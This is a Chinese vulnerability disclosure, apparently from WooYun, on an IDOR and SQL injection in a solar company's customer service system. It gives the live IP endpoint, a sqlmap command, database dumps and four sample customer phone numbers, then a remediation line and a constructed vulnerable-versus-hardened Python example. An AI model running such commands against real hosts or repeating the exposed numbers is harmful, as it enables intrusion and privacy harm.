Yijianeng Solar: an authorization bypass / SQL injection in one system leaks 510,000 customer records (names, addresses, phone numbers, installation orders, etc.)

2015-11-24 12:40

Yijianeng Solar customer service system

Code area
http://218.56.138.156:8080/web/manager/



An authorization-bypass (IDOR) URL exists:

Code area
http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456



K1.png



k2.png



Here agentNo can be changed to any value, so one agent can read other agents' records.

The same parameter is also a SQL injection point:

Code area
sqlmap.py -u "http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321" --dbs



k3.png



The current database is ecs

K4.png



List the tables and their row counts

Code area
Database: ecs
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.chanpinxinxi               | 1232569 |
| dbo.salebill                   | 989634  |
| dbo.fahuoxinxi                 | 971554  |
| dbo.vistorBack                 | 518859  |
| dbo.building                   | 515518  |
| dbo.ProductSwap                | 407312  |
| dbo.UserTable                  | 212813  |
| dbo.callerWorkStat             | 150036  |
| dbo.LinkTelArea                | 138625  |
| dbo.telInfo                    | 138280  |
| dbo.AssessmentFactorInfo       | 42993   |
| dbo.SettleAccountsItems        | 36245   |
| dbo.HistorySettleAccountsItems | 17834   |
| dbo.Tmp                        | 16654   |
| dbo.xilieinfo                  | 7161    |
| dbo.city                       | 3238    |
| dbo.UserRole                   | 2595    |
| dbo.refer                      | 2584    |
| dbo.Pd_Process                 | 2582    |
| dbo.pd                         | 2484    |
| dbo.v_goods                    | 2445    |
+--------------------------------+---------+



Work-order follow-up table:

Code area
vistorBack



K5.png



List its columns

Code area
Table: vistorBack
[32 columns]
+------------------+---------+
| Column           | Type    |
+------------------+---------+
| AgentNo          | varchar |
| BuildingResult   | varchar |
| callTel          | varchar |
| Card             | varchar |
| content          | varchar |
| firstVistorDate  | varchar |
| Id               | bigint  |
| Isbw             | int     |
| IsDel            | varchar |
| Isgd             | int     |
| Ispj             | int     |
| IsVisitor        | varchar |
| LeaveBillNo      | varchar |
| LeaveBillNo2     | varchar |
| memom            | varchar |
| openTime         | varchar |
| operateDate      | varchar |
| other            | varchar |
| Province         | varchar |
| Reason           | varchar |
| require          | varchar |
| satisfaction     | varchar |
| secondVistorDate | varchar |
| ServiceType      | varchar |
| thirdVistorDate  | varchar |
| verify           | int     |
| verifyContent    | varchar |
| verifyDate       | varchar |
| verifyPerson     | varchar |
| verifyValidate   | int     |
| VistorTime       | varchar |
| zt               | varchar |
+------------------+---------+



Customer information is involved; a sample of the phone-number column:

Code area
Database: ecs
Table: vistorBack
[4 entries]
+--------------+
| callTel      |
+--------------+
| 051683202555 |
| 83686959     |
| 85696735     |
| 87792024     |
+--------------+

Proof of vulnerability:

Huangming Solar customer service system

Code area
http://218.56.138.156:8080/web/manager/


Remediation:

Filter the input.
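As an added illustration (not code from the report or from the vendor's system), here is a constructed Python/SQLite stand-in for the /web/servlet/vistor handler: the first function reproduces both defects the report describes (agentNo never tied to the caller, and concatenated into the SQL text), the second shows the fix the remediation line points at (agentNo compared with the authenticated agent, and passed as a bound parameter). Table and column names follow the report; the rows, the session model and the status-code return are assumptions.

```python
import sqlite3

# Constructed stand-in for the ecs.vistorBack table named in the report
# (only three of its 32 columns are modelled; the rows are made up).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE vistorBack (Id INTEGER, AgentNo TEXT, callTel TEXT)")
    db.executemany("INSERT INTO vistorBack VALUES (?, ?, ?)", [
        (1, "123456", "01000000001"),
        (2, "123456", "01000000002"),
        (3, "654321", "01000000003"),
    ])
    return db

def vistor_building_vulnerable(db, agent_no):
    """Before: agentNo comes straight from the query string, is never compared
    with the caller's identity, and is concatenated into the SQL text."""
    sql = "SELECT callTel FROM vistorBack WHERE AgentNo = '%s'" % agent_no
    return [row[0] for row in db.execute(sql)]

def vistor_building_hardened(db, session_agent_no, agent_no):
    """After: the requested agentNo must equal the agent bound to the
    authenticated session (closes the IDOR), and the value travels as a bound
    parameter so it can only ever match literally (closes the injection).
    Returns (http_status, rows)."""
    if agent_no != session_agent_no:
        return 403, []
    rows = db.execute("SELECT callTel FROM vistorBack WHERE AgentNo = ?", (agent_no,))
    return 200, [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    # Any agentNo returns that agent's customer phone numbers, no login needed.
    print(vistor_building_vulnerable(db, "654321"))
    # A stray quote reaches the SQL parser: the classic symptom to test for.
    try:
        vistor_building_vulnerable(db, "12'34")
    except sqlite3.OperationalError as exc:
        print("vulnerable handler: SQL error ->", exc)
    print(vistor_building_hardened(db, "123456", "654321"))  # (403, [])
    print(vistor_building_hardened(db, "123456", "123456"))  # (200, [...])
    print(vistor_building_hardened(db, "12'34", "12'34"))    # (200, [])
```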

Source: www.wooyun.org/bugs/wooyun-2015-0145726
